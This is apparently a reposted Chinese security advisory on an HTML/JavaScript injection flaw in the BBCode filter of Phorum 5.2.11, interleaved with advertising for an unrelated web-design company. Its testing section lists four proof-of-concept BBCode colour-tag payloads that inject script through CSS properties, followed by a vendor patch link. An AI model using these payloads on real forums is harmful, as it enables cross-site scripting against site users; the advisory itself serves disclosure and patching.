Phorum过滤引擎HTML代码注入漏洞

影响版本: Phorum 5.2.11

成都创新互联专注于企业全网整合营销推广、网站重做改版、大新网站定制设计、自适应品牌网站建设、H5开发、成都商城网站开发、集团公司官网建设、外贸营销网站建设、高端网站制作、响应式网页设计等建站业务，价格优惠性价比高，为大新等各大城市提供网站开发制作服务。

漏洞描述: BUGTRAQ: 35777  

Phorum是一款基于PHP的WEB论坛程序，可在Linux和Unix操作系统下使用，也可在Microsoft Windows操作系统下使用。  Phorum的过滤引擎没有充分地验证某些BBcode参数，远程攻击者可以在所提交的请求中使用导致注入并执行恶意JavaScript代码。<*参考   crashfr （crashfr@sysdream.com）http://milw0rm.com/exploits/9231  http://secunia.com/advisories/35928/ *>

测试方法: [www.sebug.net]

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

[color=#000000;background-image:url(javascript:alert(’Sysdream_IE6_Alert’));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert(’Sysdream_IE7_Alert’));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url( http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url( http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]SEBUG

安全建议: 厂商补丁： Phorum

目前厂商已经发布了升级补丁以修复这个安全问题。

请到厂商的主页下载： http://www.phorum.org/phorum5/read.php?64,139411

【编辑推荐】

1. Macromedia ColdFusion日志条目HTML注入漏洞
2. 多家厂商的web漏洞扫描程序存在HTML注入漏洞
3. Rockliffe 邮件信息HTML注入漏洞

当前名称：Phorum过滤引擎HTML代码注入漏洞
URL地址：http://www.shufengxianlan.com/qtweb/news11/210711.html

网站建设、网络推广公司-创新互联，是专注品牌与效果的网站制作，网络营销seo公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联